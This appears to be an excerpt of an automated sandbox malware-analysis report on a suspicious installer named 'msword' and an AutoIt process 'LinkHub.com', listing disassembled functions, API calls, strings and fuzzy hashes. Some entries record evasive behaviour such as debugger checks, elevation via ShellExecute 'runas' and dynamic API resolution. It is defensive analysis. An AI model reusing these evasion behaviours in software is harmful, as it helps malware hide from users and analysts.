Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

..., xrefs: 00406293
%02x%c, xrefs: 00406270

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Skipping section: "%s", xrefs: 004050B5
Section: "%s", xrefs: 00405079

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: LinkHub.comPID: 8412, Parent PID: 7992COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	72

Executed Functions

Function 00DD5FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00DD5FF7

Part of subcall function 00DD8577: _wcslen.LIBCMT ref: 00DD858A

GetCurrentProcess.KERNEL32(?,00E6DC2C,00000000,?,?), ref: 00DD6123
IsWow64Process.KERNEL32(00000000,?,?), ref: 00DD612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00DD6155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DD6167
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00DD6175
FreeLibrary.KERNEL32(00000000,?,?), ref: 00DD617C
GetSystemInfo.KERNEL32(?,?,?), ref: 00DD61A1

Strings

|O, xrefs: 00E150F7
GetNativeSystemInfo, xrefs: 00DD6161
kernel32.dll, xrefs: 00DD6150

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: e072bd42013fd73d6adad205214fd3fc67bf74cfd98617dd46cff4d8eefde282
Instruction ID: d282eef59b1641e1f142b70bc4faa9d00d9194241bc4dc947211a08c2f9baa86
Opcode Fuzzy Hash: e072bd42013fd73d6adad205214fd3fc67bf74cfd98617dd46cff4d8eefde282
Instruction Fuzzy Hash: F1A1623290A7C6DFCF12CB6EBC411957F646B6F304B0858AED681B7222D26DA54CCB71

Function 00DD338B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00DD3368,?), ref: 00DD33BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00DD3368,?), ref: 00DD33CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00EA2418,00EA2400,?,?,?,?,?,?,00DD3368,?), ref: 00DD343A

Part of subcall function 00DD8577: _wcslen.LIBCMT ref: 00DD858A

Part of subcall function 00DD425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DD3462,00EA2418,?,?,?,?,?,?,?,00DD3368,?), ref: 00DD42A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00EA2418,?,?,?,?,?,?,?,00DD3368,?), ref: 00DD34BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00E13CB0
SetCurrentDirectoryW.KERNEL32(?,00EA2418,?,?,?,?,?,?,?,00DD3368,?), ref: 00E13CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E931F4,00EA2418,?,?,?,?,?,?,?,00DD3368), ref: 00E13D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00E13D81

Part of subcall function 00DD34D3: GetSysColorBrush.USER32(0000000F), ref: 00DD34DE
Part of subcall function 00DD34D3: LoadCursorW.USER32(00000000,00007F00), ref: 00DD34ED
Part of subcall function 00DD34D3: LoadIconW.USER32(00000063), ref: 00DD3503
Part of subcall function 00DD34D3: LoadIconW.USER32(000000A4), ref: 00DD3515
Part of subcall function 00DD34D3: LoadIconW.USER32(000000A2), ref: 00DD3527
Part of subcall function 00DD34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DD353F
Part of subcall function 00DD34D3: RegisterClassExW.USER32(?), ref: 00DD3590

